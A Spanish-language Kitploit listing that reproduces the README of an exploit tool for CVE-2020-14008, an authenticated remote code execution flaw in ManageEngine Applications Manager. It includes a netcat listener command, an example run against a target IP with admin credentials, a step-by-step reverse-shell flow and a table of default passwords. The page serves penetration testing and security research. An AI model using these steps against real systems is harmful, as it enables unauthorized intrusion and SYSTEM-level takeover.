Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/0x0d3ad/cve-2020-14008
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

Ver Repositorio
31hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-14008 - Ejecución Remota de Código en ManageEngine Applications Manager

Ejecución remota de código autenticada mediante carga arbitraria de archivos en Zoho ManageEngine Applications Manager (versiones <= 14720).

Resumen de la vulnerabilidad

Descargar herramienta
DetalleValor
CVECVE-2020-14008
CVSS7.2 (Alto)
TipoRCE autenticada / Carga arbitraria de archivos
ProductoZoho ManageEngine Applications Manager
AfectadoVersión 14720 y anteriores
RequisitoCredenciales de administrador válidas
ResultadoShell inversa a nivel de SYSTEM

El exploit abusa de la función de prueba de credenciales del monitor Weblogic. Un administrador autenticado carga un archivo weblogic.jar malicioso en la ruta de biblioteca de Weblogic esperada. Cuando se activa la prueba de credenciales, ManageEngine carga weblogic.jndi.Environment desde el JAR subido a través de JarLoader.loadClass() y newInstance(), ejecutando código Java arbitrario.

Requisitos

Sistema

  • Python 3.x
  • Java JDK (javac y jar en PATH)
  • nc (netcat) para capturar la shell inversa

Dependencias de Python

root@kitploit:~
pip3 install requests urllib3 lxml

Uso

1. Iniciar el listener

root@kitploit:~
nc -lvnp 1337

2. Ejecutar el exploit

root@kitploit:~
python3 cve-2020-14008.py <URL> <USUARIO> <CONTRASEÑA> <LHOST> <LPORT>

Ejemplos

root@kitploit:~
# Básico
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

Flujo del exploit

  1. Inicio de sesión - Autenticarse con credenciales de administrador, obtener cookie de sesión
  2. Enumerar - Obtener el directorio base de instalación de ManageEngine
  3. Construir JAR - Compilar una clase Java maliciosa (weblogic.jndi.Environment) que contiene una shell inversa en weblogic.jar
  4. Subir - Subir el JAR a classes/weblogic/version8/ mediante path traversal (alternativa: crear una tarea programada para moverlo)
  5. Activar - Invocar la prueba de credenciales de Weblogic en /testCredential.do, que carga e instancia la clase maliciosa
  6. Shell - La shell inversa se conecta al listener

Credenciales por defecto

UsuarioContraseña
adminadmin
adminpassword
administratoradministrator
guestguest

Solución de problemas

ErrorSolución
release version 7 not supportedJava 21+ eliminó el target Java 7. El script usa --release 8
FileNotFoundError: weblogic.jarLa compilación del JAR falló. Verificar que javac y jar estén en PATH
No valid response from used sessionCredenciales inválidas
Actionname not foundFalló la creación de la tarea, verificar permisos de administrador

Referencias

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • ManageEngine Advisory

Descargo de responsabilidad

Esta herramienta se proporciona únicamente para pruebas de penetración autorizadas e investigación de seguridad. El uso no autorizado contra sistemas que no posee o para los que no tiene permiso de prueba es ilegal.